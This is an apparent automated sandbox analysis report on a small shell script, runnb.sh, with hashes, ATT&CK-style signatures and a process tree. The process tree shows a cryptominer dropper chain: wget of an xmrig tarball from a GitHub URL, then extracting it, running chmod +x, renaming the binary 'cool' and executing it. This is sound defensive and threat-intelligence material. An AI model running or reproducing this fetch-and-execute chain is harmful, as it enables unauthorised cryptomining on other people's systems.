Analysis
-
max time kernel
1s -
max time network
129s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
30/10/2024, 13:11
Static task
static1
Behavioral task
behavioral1
Sample
runnb.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
runnb.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
runnb.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
runnb.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
runnb.sh
-
Size
213B
-
MD5
a1189543e2f98f6696c6d857b899ab0a
-
SHA1
30b167128357a05cb5ae4d8bd386d63839d99c4d
-
SHA256
a5951456684af2a46da1bcd8c820221c97b13a439db465c2b671fa3180d838d6
-
SHA512
472e7cd110beb4c0ff9990763988190c875dccecc726753e295d4419413bfd14ed867a9a5977adf2d6e87d6e80f18abbdd0a929473f02bbfb24e1531e71d7aef
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1580 chmod -
Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs
Abuse sudo or cached sudo credentials to execute code.
pid Process 1533 sudo -
Enumerates kernel/hardware configuration 1 TTPs 4 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
description ioc Process File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size snap File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size snap File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size snap File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size snap -
description ioc Process File opened for reading /proc/sys/kernel/ngroups_max sudo File opened for reading /proc/self/fd apt File opened for reading /proc/cgroups snap File opened for reading /proc/cgroups snap File opened for reading /proc/cgroups snap File opened for reading /proc/filesystems tar File opened for reading /proc/filesystems dpkg File opened for reading /proc/cgroups snap File opened for reading /proc/cmdline snap File opened for reading /proc/cmdline snap File opened for reading /proc/filesystems dpkg File opened for reading /proc/cmdline snap File opened for reading /proc/cmdline snap File opened for reading /proc/filesystems mv File opened for reading /proc/filesystems sudo File opened for reading /proc/self/stat sudo -
Writes file to tmp directory 16 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/fileutl.message.x5Ceos apt File opened for modification /tmp/fileutl.message.XU2EzE apt File opened for modification /tmp/fileutl.message.g2qIKQ apt File opened for modification /tmp/fileutl.message.5txVqS apt File opened for modification /tmp/fileutl.message.KPYsiF apt File opened for modification /tmp/fileutl.message.OPXXkR apt File opened for modification /tmp/fileutl.message.IwFAt3 apt File opened for modification /tmp/fileutl.message.bBFkPQ apt File opened for modification /tmp/fileutl.message.wTi3lt apt File opened for modification /tmp/fileutl.message.cB60Yr apt File opened for modification /tmp/fileutl.message.T0df92 apt File opened for modification /tmp/fileutl.message.OIT8kE apt File opened for modification /tmp/fileutl.message.HAHzxf apt File opened for modification /tmp/fileutl.message.395Zj4 apt File opened for modification /tmp/fileutl.message.9QEbig apt File opened for modification /tmp/fileutl.message.yEkgHf apt
Processes
-
/tmp/runnb.sh/tmp/runnb.sh1⤵PID:1532
-
/usr/bin/sudosudo apt install wget2⤵
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
- Reads runtime system information
PID:1533
-
-
/usr/bin/aptapt install wget2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1537 -
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
- Reads runtime system information
PID:1538
-
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
- Reads runtime system information
PID:1542
-
-
/bin/sh/bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"3⤵PID:1543
-
/usr/bin/snap/usr/bin/snap advise-snap --from-apt4⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:1544
-
-
-
/bin/sh/bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"3⤵PID:1553
-
/usr/bin/snap/usr/bin/snap advise-snap --from-apt4⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:1554
-
-
-
/bin/sh/bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"3⤵PID:1560
-
/usr/bin/snap/usr/bin/snap advise-snap --from-apt4⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:1561
-
-
-
/bin/sh/bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"3⤵PID:1566
-
/usr/bin/snap/usr/bin/snap advise-snap --from-apt4⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:1567
-
-
-
-
/usr/bin/wgetwget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz2⤵PID:1575
-
-
/bin/tartar xvf xmrigtar.tar.gz2⤵
- Reads runtime system information
PID:1579
-
-
/bin/chmodchmod +x xmrig2⤵
- File and Directory Permissions Modification
PID:1580
-
-
/bin/mvmv xmrig cool2⤵
- Reads runtime system information
PID:1581
-
-
/tmp/cool./cool2⤵PID:1582
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
235KB
MD5373fe2f2ef99005d2550a482f09a3e51
SHA168e6572b55b1e77f7d171ebac7b2579b7a6bd51d
SHA2567552d5ab0c3879756a860aaab8e7c2f8ffb9409ea9ff9e65fc046ba5c519ebe5
SHA512def9e854b824d2fddc6a15f898be73cfb679ac38563f5af854546f49c9d5d2316a40176dc41d6b360bda7b65de53863a53e4eedadf6336000b031b77a113607b